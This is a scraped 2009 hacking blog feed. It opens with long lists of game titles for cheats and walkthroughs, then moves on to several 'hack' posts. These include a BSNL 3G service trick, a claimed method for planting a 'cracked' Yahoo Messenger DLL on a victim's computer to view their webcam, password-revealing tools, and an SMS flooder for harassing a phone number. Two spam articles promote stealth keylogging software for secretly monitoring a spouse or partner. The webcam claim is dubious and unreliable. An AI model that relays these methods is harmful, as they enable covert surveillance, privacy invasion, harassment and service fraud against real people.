Battlezone 2 - Combat Commander<br />
BioShock<br />
Black & White<br />
Black & White 2<br />
Block Drop - Flash Game<br />
Blockland<br />
Bookworm Adventures Volume 2<br />
Borderlands<br />
Build-A-Bearville<br />
Cake Pirate<br />
Call Of Duty - World At War<br />
Call of Duty 2<br />
Call of Juarez - Bound in Blood<br />
Canabalt<br />
Captain Claw<br />
Cars<br />
Champions Online<br />
Championship Manager 2007<br />
Championship Manager 2008<br />
Charger Escape<br />
Chomper 3D<br />
Civiballs 2<br />
Clive Barker's Jericho<br />
Cloudy with a Chance of Meatballs<br />
Club Penguin<br />
Code of Honor 3 - Desperate Measures<br />
Combat Arms<br />
Command & Conquer - Generals<br />
Command & Conquer - Generals - Zero Hour<br />
Command & Conquer - Renegade<br />
Conflict - Global Storm<br />
Conflict Desert Storm<br />
Conflict Zone<br />
Constantine<br />
Cool 21<br />
Cradle of Rome<br />
Crash Bandicoot 3 - Warped<br />
Cricket 2007<br />
Cricket Revolution<br />
Cyber Mouse Party 2<br />
Darkest of Days<br />
Dead Tree Defender<br />
Deadliest Catch - Alaskan Storm<br />
Demigod<br />
Demonic Defense 4<br />
DiRT 2<br />
Diablo 2<br />
Diablo 2 - Lord of Destruction<br />
Dino Run<br />
Dofus<br />
Doom 3<br />
Drag Racer V3<br />
Dragon Cave<br />
Dragon Fable<br />
Dragon's Lair 3D<br />
Dungeon Hero<br />
Edge of Twilight<br />
Elder Scrolls 3 - Morrowind<br />
Elder Scrolls 4 - Oblivion<br />
Emperor of the Fading Suns<br />
Empire Strikes Back, The<br />
Endless War 3<br />
Enter The Matrix<br />
Eragon<br />
Escape from the Planet of the Robot Monsters<br />
Europa Universalis - Crown of the North<br />
Europa Universalis 3<br />
Evil Genius<br />
Evony<br />
Exmortis 3<br />
F.E.A.R. 2 - Reborn<br />
Fable - The Lost Chapters<br />
Fabulous Finds<br />
Fallen Empire - Legions<br />
Fallout 3<br />
Fallout 3 - Mothership Zeta<br />
FantAge<br />
Farm Frenzy 2<br />
Feeding Frenzy 2<br />
Feudalism 2<br />
Fifa Manager 2009<br />
Final Fantasy 7<br />
Flw Professional Bass Tournament 2000<br />
FlyFF<br />
Football Manager 2009<br />
Free Realms<br />
Freedom Fighters<br />
FusionFall<br />
Gangland<br />
Gemini Lost<br />
GetAmped<br />
Ghajini - The Game<br />
Ghost Recon<br />
Ginormo Sword<br />
Google Earth - Flight Simulator<br />
Gothic 2<br />
Gothic 3 - Forsaken Gods<br />
Grand Chase<br />
Grand Theft Auto - San Andreas [Part 2]<br />
Grand Theft Auto - Vice City<br />
Grand Theft Auto 3<br />
Grand Theft Auto 3 [hints]<br />
Grand Theft Auto 4<br />
Guitar Hero World Tour<br />
Gun<br />
Habbo Hotel<br />
Halo<br />
Halo 2<br />
Hammer Heads Deluxe<br />
Hearts of Iron 3<br />
Heli Attack 3<br />
Heroes of Might & Magic 1<br />
Heroes of Newerth<br />
Hidden & Dangerous<br />
Higher!<br />
Hitman - Codename 47<br />
Hitman - Contracts<br />
Hitman 2<br />
Hunter Hunted<br />
Hunting Unlimited 2010<br />
I. M. Meen<br />
Interactive Buddy<br />
Jurassic Park - Operation Genesis<br />
Knight Rider 2<br />
League of Legends<br />
Lego - Mars Mission<br />
Lego Island 2<br />
Lego Racers 2<br />
Lego Rock Raiders<br />
Little Big Adventure 1<br />
Lord Of The Rings - The Battle for Middle-Earth 2<br />
Luna Online<br />
M.I.B. - Men in Black<br />
Madballs in Babo - Invasion<br />
Madden NFL 2005<br />
Madden NFL 2007<br />
Madness Interactive - Halo Slayer<br />
Maple Story<br />
Mario Forever 4.4<br />
Mass Effect<br />
Max Dirt Bike 2<br />
Max Payne<br />
Max Payne 2 - The Fall of Max Payne<br />
MechQuest<br />
Medal of Honor - Pacific Assault<br />
Mercenary Wars<br />
Metal Gear Solid<br />
Mortal Kombat 4<br />
Moshi Monsters<br />
Moss<br />
My Kingdom for the Princess<br />
MySims<br />
NBA 2K9<br />
NBA Live 2001<br />
NFL Rush Zone<br />
Naruto Arena<br />
Need For Speed - Carbon<br />
Need For Speed - ProStreet<br />
Need for Madness<br />
Need for Speed - Most Wanted<br />
Need for Speed - Underground 2<br />
Need for Speed 2<br />
Neuro Hunter<br />
Neverwinter Nights 2 - Mask Of The Betrayer<br />
Ninja Blade<br />
OurWorld<br />
Overlord II<br />
Pandemic - American Swine<br />
Phantasy Star Online - Blue Burst<br />
Pirates of the Caribbean<br />
Platform Racing 2<br />
Pokemon Emerald<br />
Pokemon Indigo<br />
Pokemon Moon RPG<br />
PokemonLake<br />
Poptropica<br />
Populous - The Beginning<br />
Port Royale<br />
Powder Game<br />
Prince of Persia - The Two Thrones<br />
Prince of Persia 2 - Warrior Within<br />
Project IGI- I'm going in<br />
Prototype<br />
Pyroblazer<br />
Quantz<br />
Race On<br />
Raft Wars<br />
Rage 3<br />
Rainbow Six - Rogue Spear<br />
Raptor - Call of the Shadows<br />
Real War - Rogue States<br />
Realms of Chaos<br />
Red Faction - Guerrilla<br />
Relentless - Twinsen's Adventure<br />
Resident Evil 4<br />
Resident Evil 5<br />
Restaurant City<br />
Riddle of the Sphinx<br />
Righteous Kill 2<br />
Risen<br />
Risk Your Life 2 - Incomplete Union<br />
Riven - The Sequel to Myst<br />
Road Rash<br />
Road Rash 3D<br />
Road To Bagdad<br />
Road Wage<br />
Road Warrior<br />
Road Wars<br />
Road to India<br />
Roadblasters<br />
Robin Hood - Defender of the Crown<br />
Robin Hood - The Legend of Sherwood<br />
Robin Reno<br />
Roblox<br />
RoboBlitz<br />
Robocop 1<br />
Robocop 2D<br />
Robocop 3<br />
Robot Arena<br />
Robot Arena 2 - Design And Destroy<br />
Robot Rage<br />
Rogue Warrior<br />
Roller Coaster Kingdom<br />
RollerCoaster Tycoon<br />
Rome Total War<br />
RuneScape<br />
S.C.A.R.S<br />
S.T.A.L.K.E.R. - Shadow Of Chernobyl<br />
Saints Row 2<br />
Samurai Warriors 2<br />
Scary Maze<br />
Section 8<br />
Settlers 3<br />
Shadowtale<br />
Sherwood Dungeon<br />
Shin Sangoku Musou 5<br />
Silent Hunter 3<br />
Soakamon<br />
Sonny 2<br />
Star Wars - Battlefront<br />
Star Wars - The Clone Wars - Republic Heroes<br />
Star Wars - The Force Unleashed - Ultimate Sith Edition<br />
StarCraft<br />
Stardoll<br />
Stick Arena Ballistick<br />
Stick Cricket<br />
Stick RPG Complete<br />
Stickman Madness 3<br />
Storm The House 3<br />
Street Legal 2 Redline<br />
Super Smash Flash<br />
Swords and Sandals 2 - Emperor's Reign<br />
TG Motocross<br />
Team Fortress 2<br />
Territory War Online<br />
Texas Cheat 'Em<br />
The Classroom 3<br />
The Fifth Disciple<br />
The Last Stand 2<br />
The Road To El Dorado - Gold And Glory<br />
The Sims 2<br />
The Sims 2 - Double Deluxe<br />
The Sims 2 - Mansion and Garden Stuff<br />
The Sims 3<br />
The Sims 3 - World Adventures<br />
Touhou Hisouten - Scarlet Weather Rhapsody<br />
Transarctica<br />
Tropico 3<br />
Urban Brawl - Action Doom 2<br />
Venetica<br />
Virtua Tennis 2009<br />
Virtual Families<br />
Virtual Villagers 3 - The Secret City<br />
WWE Raw - Total Edition<br />
WarCraft 3 - Reign of Chaos<br />
Warhammer 40,000 - Dawn Of War - Dark Crusade<br />
Warhammer 40,000 - Dawn Of War - Winter Assault<br />
Warhammer 40,000 - Dawn Of War 2<br />
WarpForce<br />
Windows Pinball XP<br />
Wizard 101<br />
Wolfenstein<br />
Wonderland Adventures<br />
World Domination 2<br />
Worms World Party<br />
X-Men Origins - Wolverine<br />
X3 - Terran Conflict<br />
Zombie Apocalypse<br />
Zuma's Revenge!<br />
Zwinky<br />
<br />
</td></tr>
<tr><td bgcolor="#ffcc00" width="596"><b><span style="color: black;"> PC Walkthroughs</span></b><br />
</td></tr>
<tr><td width="596">Abuba the Alien<br />
Air Craft Escape<br />
Alchemia<br />
Alice is Dead<br />
Allied Escape<br />
Andy - The Cave of Treasure<br />
Bear in Cage<br />
Being One - Part Three - Dark Matter<br />
Bird's Egg<br />
Bomb Escape 3<br />
Caverns<br />
Clown Face Escape 3<br />
Dead Frontier: Outbreak<br />
Dream Escape Strategy<br />
Erzuroom Escape 3: Room Z<br />
Escape Velocity Nova<br />
Escape from Blender Art Gallery<br />
Exodus from the Earth<br />
Find the Escape Men - 2 - In the Telephone Box<br />
Find the Numbers Challenge 26<br />
Heist<br />
Hospital Escape<br />
Ice Room Escape<br />
Inspector Wombat<br />
Kafkamesto<br />
Kidnapped by Aliens 2<br />
Life Ark 5<br />
Make it Good<br />
Monkey Climbs<br />
Mr. Jones Graveyard Shift<br />
Office Escape (Rogue Poker)<br />
Omelette Room Escape<br />
Poptropica - Spy Island<br />
Princess Isabella and the Witch's Curse<br />
Rescue Your Girlfriend<br />
Rings Of Zilfin<br />
Robot City<br />
Shower Escape<br />
Steak Room Escape<br />
Stick Arena - Ballistick<br />
Sudeki<br />
The Life Ark 2<br />
The Life Ark 3<br />
The Life Ark 4<br />
U-boat Escape<br />
Village Escape Part 3<br />
Volcano Escape<br />
Ying Yang Escape 3<br />
<br />
</td></tr>
<tr><td bgcolor="#ffcc00" width="596"><b><span style="color: black;"> Console Cheats</span></b><br />
</td></tr>
<tr><td width="596">ActRaiser<br />
Advance Wars - Dark Conflict<br />
Aerowings<br />
AirBoardin USA<br />
Animaniacs - Lights, Camera, Action!<br />
Area 51<br />
Armored Core - For Answer<br />
Assassin's Creed<br />
Asterix At The Olympic Games<br />
Automobili Lamborghini<br />
Bankshot Billiards 2<br />
Baroque<br />
Battlestar Galactica<br />
Bionicle - The Game<br />
Bleach - Shattered Blade<br />
Blitz - The League 2<br />
Brothers In Arms DS<br />
Bully<br />
CART Fury Championship Racing<br />
Call Of Duty 3<br />
Chao Adventure<br />
Chew Man Fu<br />
Code Lyoko - Quest For Infinity<br />
Conflict Global Storm<br />
Contra III - The Alien Wars<br />
Crash Tag Team Racing<br />
Def Jam Fight For NY<br />
Donald Duck - Goin' Quackers<br />
Elemental Gimmick Gear<br />
Expendable<br />
Frogger 2 - Swampy's Revenge<br />
God of War 2<br />
Justice League Heroes<br />
Legend of Zelda - Ocarina of Time<br />
Lego Indiana Jones - The Original Adventures<br />
Pokemon Sapphire<br />
Resident Evil 4<br />
Road Trip - Shifting Gears<br />
Saints Row 2<br />
Scorpion King, The - Sword of Osiris<br />
Skate cheats<br />
Star Wars Battlefront 2<br />
Super Mario 64 DS<br />
Super Puzzle Fighter 2 Turbo HD Remix<br />
Tekken 4<br />
Total Overdose - A Gunslinger's Tale in Mexico<br />
Twisted Metal 2<br />
UEFA Champions League 2004-2005<br />
Wakeboarding Unleashed<br />
Wii Sports<br />
Worms 4 - Mayhem<br />
Yoshi's Story<br />
Yu-Gi-Oh! Dawn Of Destiny<br />
<div style="background-color: red;"><a href="http://www.blogger.com/goog_1260254425935"><span style="font-size: x-large;"><br />
</span></a><br />
</div><div style="background-color: red; font-family: Georgia,"Times New Roman",serif;"><a href="http://www.ziddu.com/download/7648944/cheatbook-database2009.zip.html"><span style="font-size: x-large;">download:</span></a><br />
</div><br />
</td></tr>
</tbody></table><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-79090859085735846692009-10-20T04:48:00.000-07:002009-10-20T04:48:50.799-07:00hack <span class="Apple-style-span" style="color: red; font-family: verdana, arial, helvetica; font-size: 24px; font-weight: 800;"> BSNL 3G hack</span><br />
Here is a 100 % working trick to unlimited use BSNL 3G at the cost of<br />
Normal GPRS<br />
<br />
First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.<br />
now activate gprs by sending sms GPRS PRE to 53733 It will be<br />
actrivated in 24 hours, after activation get gprs settings by calling c.care<br />
<br />
Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)<br />
in it, After activation You have to chnage only one thing in yor 3G enabled cell.<br />
<br />
Go to settings>tools>settings>phone&g<br />
<br />
t;network>network mode> now select UMTS<br />
<br />
THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name,select it as default<br />
<br />
<br />
Now see your data singnals logo..... vola it is converted into 3G<br />
You will get near about 500kbps to 1200 kbps speed<br />
Remember use BSNLEGPRS or BSNLPREPAID as ur access point<br />
<br />
This trick is copy pasted from some other source<br />
but its 100% working<br />
Enjoy 3G at appr.<br />
<br />
Here is a 100 % working trick to unlimited use BSNL 3G at the cost of<br />
Normal GPRS<br />
<br />
First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.<br />
now activate gprs by sending sms GPRS PRE to 53733 It will be<br />
actrivated in 24 hours, after activation get gprs settings by calling c.care<br />
<br />
Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)<br />
in it, After activation You have to chnage only one thing in yor 3G enabled cell.<br />
<br />
Go to settings>tools>settings>phone&g<br />
<br />
t;network>network mode> now select UMTS<br />
<br />
THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name,select it as default<br />
<br />
<br />
Now see your data singnals logo..... vola it is converted into 3G<br />
You will get near about 500kbps to 1200 kbps speed<br />
Remember use BSNLEGPRS or BSNLPREPAID as ur access point<br />
<br />
This trick is copy pasted from some other source<br />
but its 100% working<br />
Enjoy 3G at appr.<br />
<br />
<div><br />
</div><div><br />
</div><div><div><span style="color: #990000;"><span class="Apple-style-span" style="font-size: x-large;">See Anyones Yahoo Webcam</span></span></div><div><br />
</div><div><a href="http://webnesbay.com/wp-content/uploads/2009/08/yahoo-messenger.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="yahoo-messenger" border="0" class="aligncenter size-full wp-image-634" height="250" src="http://webnesbay.com/wp-content/uploads/2009/08/yahoo-messenger.jpg" title="yahoo-messenger" width="250" /></a>This is new trick to hack web cam of Yahoo messenger. We can view the other persons Yahoo Webcam, Who is always denying us.<span class="Apple-style-span" style="color: #bfb792; font-family: verdana, arial, helvetica;"></span></div></div><div><span style="font-family: Arial; font-size: small;"><span class="Apple-style-span" style="font-size: 13px;"><div>Follow the below steps to do this</div><div><br />
</div><div>1) Open the following location C:\Program Files\Yahoo!\Messenger</div><div><br />
</div><div>2) You will find the file ” res_msgr.dll “. Delete this file.</div><div><br />
</div><div>3) Download this cracked file from the below link</div><div><br />
</div><div>Click Here</div><div><br />
</div><div>4) After Downloading it, Paste this in (C:\Program Files\Yahoo!\Messenger)</div><div><br />
</div><div>NOTE: Don’t replace the file. Delete the file first and then paste the cracked file in the same folder</div><div><br />
</div><div>Then close every thing and restart the system…</div><div><br />
</div><div>How it works?</div><div><br />
</div><div>The cracked “dll” file should be placed in the victims computer (whose web cam u want to see). Then you go back to your system and login to your messenger and place a “request” to see their cam. Then definitely they will press “NO” this is the place where the crack will work. The moment they press “NO” u will start seeing them. This is the hack. Enjoy.</div><div><br />
</div><div><span class="Apple-style-span" style="color: #bfb792; font-family: verdana, arial, helvetica; font-size: 11px;"><h1><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: x-large;">Reveal Hidden Passwords</span></span></h1></span></div><div><div>Freeware to Reveal Hidden Password</div><div><br />
</div><div>WARNING:- STEALING PASSWORD IS CRIME</div><div><br />
</div><div>There are some cases that we forgot the passwords previously saved in the software or website, yet we need to get the password urgently! The password field shows only “********”, without any password hints or help! What do you do?</div><div><br />
</div><div>Don’t knock your head against the wall. Here I introduce two freeware that help you to recover the masked password.</div><div><br />
</div><div>Asterisk Key</div><div><span class="Apple-style-span" style="color: #bfb792; font-family: verdana, arial, helvetica; font-size: 11px;"><img alt="Asterisk Key - Reveals hidden passwords" height="295" src="http://liewcf.com/blog/wp-images/asterisk-key.gif" title="Asterisk Key - Reveals hidden passwords" width="400" /></span></div><div><span style="color: #bfb792; font-family: verdana, arial, helvetica; font-size: small;"><span class="Apple-style-span" style="font-size: 11px;"><br />
</span></span></div><div><span style="color: #bfb792; font-family: verdana, arial, helvetica; font-size: small;"><span class="Apple-style-span" style="font-size: 11px;"><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">Asterisk Key – Reveals hidden passwords</span></span></div><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"><br />
</span></span></div><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">Asterisk Key can reveal hidden passwords on password dialog boxes and web pages. Launch Asterisk Key, and it will scan active window for password dialog box and show the hidden password. Work best for web pages.</span></span></div><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"><br />
</span></span></div><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">[ Homepage - Download ]</span></span></div><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"><br />
</span></span></div><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">Password Reveal</span></span></div><div><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="color: #bfb792; font-size: 11px;"><img alt="Password Reveal" height="215" src="http://liewcf.com/blog/wp-images/password-reveal.gif" title="Password Reveal" width="406" /></span></span></span></div><div><strong><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">Password Reveal</span></span></strong><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"> </span></span><a href="" id="AdBriteInlineAd_works" name="AdBriteInlineAd_works" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-position: 50% 100%; background-repeat: repeat-x; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">works</span></span></a><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"> for windows program, not web pages. Simply drag and drop the cross </span></span><a href="" id="AdBriteInlineAd_sign" name="AdBriteInlineAd_sign" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-position: 50% 100%; background-repeat: repeat-x; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">sign</span></span></a><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"> to the password dialog box, it will show the masked password.</span></span><br />
<span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">[ </span></span><a href="http://camtech2000.net/Pages/Password_Reveal.html" style="text-decoration: underline;"><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">Homepage</span></span></a><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"> - </span></span><a href="http://camtech2000.net/Programs/pswrvl10.zip" style="text-decoration: underline;"><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">Download</span></span></a><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"> ]</span></span><br />
<strong><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;">Thought:</span></span></strong><span style="color: black;"><span class="Apple-style-span" style="font-size: medium;"><br />
Please use these tools wisely. I only use them only to recover the passwords that previously saved(and does not write down anywhere) by company’s ex-IT executive.</span></span><br />
<span style="color: black;"><br />
</span><br />
<span style="color: black;"></span><br />
<span style="color: black;"><span class="Apple-style-span" style="font-size: x-large;">Ibibo SMS Flooder</span><br />
<br />
<span class="Apple-style-span" style="font-size: medium;">Ibibo SMS Flooder - XxSidxX</span><br />
<span class="Apple-style-span" style="font-size: medium;"><br />
</span><br />
<span class="Apple-style-span" style="font-size: medium;">Hey guys.....</span><br />
<span class="Apple-style-span" style="font-size: medium;">I have made a new flooder which uses ibibo service to flood the number.</span><br />
<span class="Apple-style-span" style="font-size: medium;">[REQUIREMENTS]</span><br />
<span class="Apple-style-span" style="font-size: medium;">1. Ibibo Account. { https://auth.ibibo.com/register }</span><br />
<span class="Apple-style-span" style="font-size: medium;">2. Your Mobile activated with ibibo Account. { http://imobile.ibibo.com/Call/Start.aspx?turl=http://isms.ibibo.com/ }</span><br />
<span class="Apple-style-span" style="font-size: medium;">3. Number you want to flood</span><br />
<span class="Apple-style-span" style="font-size: medium;"><br />
</span><br />
<span class="Apple-style-span" style="font-size: medium;">[NOTE]</span><br />
<span class="Apple-style-span" style="font-size: medium;">1. Flooder might stop working after some time because its Ibibo ....</span><br />
<span class="Apple-style-span" style="font-size: medium;">2. Your Number will be displayed in the message.</span><br />
<span class="Apple-style-span" style="font-size: medium;">3. Might be slow . Use it only if u want...</span><br />
<span class="Apple-style-span" style="font-size: medium;">4. FLOODING IS ILLEGAL. USE AT YOUR OWN RISK {Using pirated windows is also illegal }</span><br />
<span class="Apple-style-span" style="font-size: medium;">5. Not more then 50 sms at a time because i dont have a good server.</span><br />
<span class="Apple-style-span" style="font-size: medium;"><br />
</span><br />
<span class="Apple-style-span" style="font-size: medium;">[WEBSITE]</span><br />
<span class="Apple-style-span" style="font-size: medium;">http://flannery-nissan.com/xxsidxx/sms.php</span><br />
</span><br />
</div><div><br />
</div></span></span></div></div></span></span></div><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-21052824950971339182009-10-20T01:18:00.000-07:002009-10-20T01:18:10.445-07:00Cheating<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: Verdana, Arial, Helvetica, sans-serif;"><b></b></span><br />
<b><h1 class="h1article_title" style="display: inline; font-family: verdana, geneva, lucida, arial, helvetica, sans-serif; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-size: x-large;"><span style="color: #990000;">How to Catch My Boyfriend Cheating Online</span></span></h1></b><span class="Apple-style-span" style="font-size: x-large;"><span style="color: #990000;"> </span></span><br />
<span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-size: 12px;"><br />
</span></span><br />
<span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-size: 12px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;"></span></span></span><br />
<span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small;"><table border="0" cellpadding="10" cellspacing="1"><tbody>
<tr><td>Facebook, MySpace, Twitter, these are all fun sites to get into and they provide plenty of advantages for people. But these sites are not as innocent as they seem. In fact, your boyfriend might be using these sites right now to hook up with other women.<br />
<br />
Indeed, the question how to catch my boyfriend cheating online is something that is being asked by women who suspect that their boyfriends is really doing something fishy on the Internet. Do you know all of your boyfriend s friends in Facebook and MySpace? Do you know whom he is regularly Tweeting? If not, then you probably need to be more aware of your boyfriend s online activities.<br />
<br />
The Internet is a very useful tool but it can also be used for dirty deeds such as cheating. But if you are asking the question how to catch my boyfriend cheating online, then you must know that there are ways to effectively do it and you will know them here in this article.<br />
<br />
How To Catch My Boyfriend Cheating<br />
<br />
Use your female intuition. Women have the innate capacity to know whether their boyfriend is doing something behind their backs or not and this is called female intuition. There are women who have very keen senses and they are able to accurately tell whether or not their boyfriends are cheating or not. Of course, female intuition is not a very reliable way to tell whether or not your significant other is seeing someone else. And if you confront your boyfriend if he is cheating or not citing female intuition as your only basis, then you will only look foolish in front of your boyfriend and he will be able to quickly dismiss your allegations.<br />
<br />
Use computer and online tools. To catch your boyfriend red handed what you need are evidences and to gather evidences, you will need tools. You will be delighted to know that you do not need to rely purely on female intuition alone because there are available computer and online tools that can help you determine whether or not your boyfriend is cheating or not. One of these tools is a email finder program which can determine important information about a person using only his or her email. The only problem with this tool is that you still need to get the email of the person whom your boyfriend is regularly communicating with to use this tool.<br />
<br />
If you don t have a mystery email yet then you can use a computer monitoring program to track and record all of your boyfriend s activities online. Some of these programs will even allow you to monitor your boyfriend s computer from a remote location using the Internet. Though such a program, you can easily know what websites your boyfriend is visiting, the persons he is emailing and even the keystrokes that he is inputting on his PC. It will do all the hard and risky work for women who simply cannot do the spying themselves.<br />
<br />
So if you are asking, how to catch my boyfriend cheating online, know that you have many options to do so.</td></tr>
<tr><td>Are you still asking yourself how to catch my boyfriend cheating online? Visit us NOW and get the tools you need to get the job done. Verny L is the owner of <a href="http://www.catchcheating.net/" style="color: black; font-weight: bold; padding-left: 5px; text-decoration: none;" target="_blank" title="http://www.catchcheating.net">http://www.catchcheating.net</a>. Get all the information you need, get all the tools you need so you can find out the truth.<br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><span style="color: #cc0000;"><br />
</span></span><b><h1 class="h1article_title" style="display: inline; font-family: verdana, geneva, lucida, arial, helvetica, sans-serif; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-size: x-large;"><span style="color: #cc0000;">How to Find Out What Websites Your Husband is Visiting Online</span></span></h1></b><span class="Apple-style-span" style="font-size: x-large;"><span style="color: #cc0000;"> </span></span><br />
<br />
<br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; color: #333333; font-size: 12px;"><table border="0" cellpadding="10" cellspacing="1"><tbody>
<tr><td>How to find out what websites your husband is visiting online. Cheating has been around for thousands of years. It is probably as old as marriage itself. The means of cheating though have evolved. Before, the only opportunity for people to cheat is when they meet someone either from work or from some place that they have gone to. Now, individuals can cheat through virtual worlds using the power of the Internet.<br />
<br />
For most parts, the Internet is a very useful tool that serves many noble purposes. But the Internet can also be used in not so rightful ways. With the myriad of web applications that allow people to reach out to other people, it is probably inevitable that some married men (and women) will use it to hook up with other individuals. If you want to know how to find out what website your husband is visiting online, then you ve come to the right place. Here you will find the ways to tell what sites your husband regular surfs to meet women.<br />
<br />
Of course, you can always sneak up on your husband s computer when he is not around and check the history log of the browser that he is using. There you will find out what websites he has visited as well as the date and time when he accessed the sites. The only downside to this method is that it is very risky. If your husband is really doing something behind your back then he is probably very careful about leaving evidences that other people, especially you, might see.<br />
<br />
If he is the thorough kind – and almost all cheating husbands are – then he probably clears the history list of his web browser so not to leave any signs and he has also most likely protected his computer with a password so you or anyone who will try to access it for that matter will have a hard time getting in.<br />
<br />
When you get caught then that is another story altogether and a whole new mess. If your husband finds out that you are on his tail, then he will be more careful next time about hiding his tracks. When he does that, then it will be harder for you to catch him.<br />
<br />
If you want to know how to find out what website your husband is visiting online, then you must know that there is an easier and more effective way for you to do this than physically snooping around your husband s PC and that is through the help of moder technology. There is a computer software that will allow you to find out all of of your husband s computer and Internet activities without even touching his computer.<br />
<br />
All you need to do is install the program on his computer once and that s it. The program logs your husbands activities and then uploads it to a website from which you can retrieve it. You don t have to worry about your husband finding out about this program because it works on stealth mode which means it is completely undetectable.</td></tr>
<tr><td><span class="head_bold" style="background-color: inherit; color: black; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold;">- </span>Do you want to find out more about this software, do you want to find out what websites your husband is visiting online visit us NOW!<a href="http://www.catchcheating.net/find_out_what_websites_your_husband_is_visiting.html" style="color: black; font-weight: bold; padding-left: 5px; text-decoration: none;" target="_blank" title="http://www.catchcheating.net/find_out_what_websites_your_husband_is_visiting.html">http://www.catchcheating.net/find_out_what_websites_your_husband_is_visiting.html</a>Verny L is the owner of <a href="http://www.catchcheating.net/" style="color: black; font-weight: bold; padding-left: 5px; text-decoration: none;" target="_blank" title="http://www.catchcheating.net">http://www.catchcheating.net</a> we will help you catch your husband</td></tr>
</tbody></table></span><br />
<br />
</td></tr>
</tbody></table></span><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-10737441863708341002009-10-20T00:45:00.000-07:002009-12-07T23:33:39.873-08:00virus<span class="Apple-style-span" style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 12px; line-height: 15px;"></span><br />
<div style="font-family: Arial, Verdana, Tahoma; line-height: 15px;"><span class="Apple-style-span" style="font-size: x-large;"><span style="color: #990000;">virus</span></span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>Most viruses are written with a malicious intent, so that they can cause damage to<span class="IL_SPAN">programs</span> and data in addition to spreading themselves. Viruses infect existing <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">programs</span>to alter the behavior of <span class="IL_SPAN">programs</span>, actively destroy data, and perform actions on storage devices that render their stored data inaccessible.</span><br />
